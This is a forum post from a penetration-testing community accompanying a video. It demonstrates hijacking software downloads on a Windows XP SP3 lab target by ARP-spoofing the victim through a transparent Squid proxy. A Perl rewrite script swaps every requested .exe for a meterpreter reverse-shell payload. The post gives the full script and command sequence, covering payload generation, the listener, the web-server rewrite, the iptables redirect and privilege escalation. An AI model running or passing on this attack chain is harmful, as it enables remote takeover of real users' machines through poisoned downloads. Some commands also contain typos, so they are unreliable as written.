Results 1 to 5 of 5

Thread: [Video] Owning Windows (XP SP3 vs. Squid)

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Owning Windows (XP SP3 vs. Squid)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4862927/
    Download video: http://www.mediafire.com/?l7gezd8ai263a72
    Download Script (replace.pl): http://www.mediafire.com/?nheqdn6h4i6w17k


    Brief Overview
    This screencast demonstrates hijacking applications when they are being downloaded from the Internet and replacing the program with a meterpreter agent instead. The files can be downloaded either via the target or another program (For example, self-updating programs).

    The attacker takes control of the traffic by doing a “Man In The Middle” (MITM) attack, to analyse the traffic, in-which if the requested file ends in ".exe", it is redirected to the attackers web server that will always reply with the same filename with the agent creating the illusion that it was the requested file.

    Please note: Unlike the other two videos previously, where the attacker was targeting programs/services that comes with the Operating System, the attacker pursuits 3rd party applications - or the process of trying to install them. The result of this is, there is more user interaction needed than before, whereas before it was either very little (visit any web page) or nothing. Therefore the attacker needs the target to perform a certain action(s) (either willing or unaware).
    The chosen method of attack can be performed by a simpler method, however this method was chosen for reasons of future posts.


    Scenario/Setup
    This is the third video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 3, in the aid of seeking better security, after becoming compromised... twice.

    After spending hours re-formatting, installing and restarting the target is using a fully up-to-date system running Windows XP SP3 system with the latest security patches as of March 2011. They haven't used their system "much" as every setting is still at their default options and haven't install any programs such as Anti-Virus, Firewalls or any browser-based application (E.g. Flash or Java).

    This time around, the attacker approaches the attack by attacking the process of installing new or updating existing software.


    What was needed?

    • Nmap – (Can be found in BackTrack 4-R2)
    • PostgreSQL – (Can be found in BackTrack 4-R2)
    • Metasploit – (Can be found in BackTrack 4-R2)
    • Apache – (Can be found in BackTrack 4-R2)
    • A Text Editor – (Kate can be found in BackTrack 4-R2)
    • Squid – (Can be found in the BackTrack repository )
    • arpspoof – (Part of the DSniff suite which can be found in the BackTrack 4-R2)



    replace.pl
    Code:
    #!/usr/bin/perl
    ########################################################################
    # replace.pl         --- Squid Script (Application replacement)        #
    # g0tmi1k 2011-03-09                                                   #
    ########################################################################
    use IO::Handle;
    use File::Basename;
    
    $|=1;
    $ourIP = "192.168.0.33";
    $debug = 0;
    
    if ($debug == 1) { open (DEBUG, '>>/tmp/replace_debug.log'); }
    autoflush DEBUG 1;
    
    while (<>) {
       chomp $_;
       if ($_ =~ /(.*\.exe)/i) {
          if ($debug == 1) { print DEBUG "Input: $url\n"; }
          $url = $1;
          $filename = basename( $url );
          $new_url = "http://$ourIP/$filename";
          print "$new_url\n";
          if ($debug == 1) { print DEBUG "Filename: $filename\nOutput: $new_url\n"; }
       }
       else {
          print "$_\n";
       }
    }
    Method

    • Start network services and obtain an IP address
    • Create resource file and agent for metasploit
    • Start and configure metasploit to listen for the backdoor
    • Configure and start apache web server
    • Download, install and configure Squid proxy
    • Perform a man in the middle attack
    • Wait for target to download a program (either willing or unknown)
    • Game Over



    Commands:
    Code:
    start-network
    dhclient eth0
    /etc/init.d/postgresql-8.3 start
    clear
    
    map 192.168.0.* -n -sn -sP
    nmap 192.168.0.103 -T4 -O -v
    clear
    
    echo "client.railgun.user32.MessageBoxA(0,\"Corrupt file. Please re-download\",\"Setup\",\"MB_OK\")" > /root/replace.rb
    msfpayload windows/meterpreter/reerse_tcp LHOST=192.168.0.33 LPORT=4444 X > /var/www/evil.exe 
    export GOCOW=1     # Always cow logo ;)
    msfconsole
    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 0.0.0.0
    set ExitOnSession false
    set AutoRunScript /root/replace.rb
    show options
    exploit -j
    
    #kate -> New
    Options +FollowSymlinks
    RewriteEngine on
    RewriteRule ^(.*) evil.exe
    # Save: /var/www/.htaccess
    #kate -> Open: /etc/apache2/sites-enabled/000-default
    #Edit (Line 11): AllowOverride All
    #Save
    start-apache   # /etc/init.d/apache2 start
    
    apt-cache search squid
    apt-get install squid3
    y
    update-rc.d -f squid3 remove
    
    kate -> Open: /etc/squid3/squid.conf
    Edit (Line 588): acl localnet src 192.168.0.0/16
    Edit (Line 644): http_access allow localnet
    Edit (Line 868): http_port 3128 transparent
    Add (Line: *end*): url_rewrite_program /root/replace.pl
    Save
    kate -> Open: /root/replace.pl
    chmod 755 /root/replace.pl
    /etc/init.d/squid3 restart
    
    iptables --table nat --append PREROUTING --in-interface eth0 --proto tcp --destination-port 80 --jump REDIRECT --to-port 3128
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #cat /proc/sys/net/ipv4/ip_forward
    #Start -> run -> cmd -> arp -a
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    #Start -> run -> cmd -> arp -a
    
    IE -> http://www.filehippo.com -> Search: flash. Download & Run
    
    sessions -l -v
    #Kill arpspoof
    
    IE -> http://www,filehippo.com -> Search: notepad++. Download Older & Run
    
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    
    Notepad++ -> ? -> Check for updates
    
    #Kill arpspoof
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    getsystem
    getuid
    Last edited by g0tmi1k; 03-10-2011 at 08:14 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Owning Sever through Local File Include
    By spawn in forum BackTrack Videos
    Replies: 1
    Last Post: 03-08-2011, 06:13 PM
  2. Replies: 5
    Last Post: 03-07-2011, 12:18 AM
  3. Replies: 1
    Last Post: 03-04-2011, 04:34 PM
  4. Replies: 21
    Last Post: 03-02-2011, 07:06 PM
  5. Owning a Windows XP with a shared folder.
    By sickness in forum BackTrack Videos
    Replies: 6
    Last Post: 02-12-2011, 02:56 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •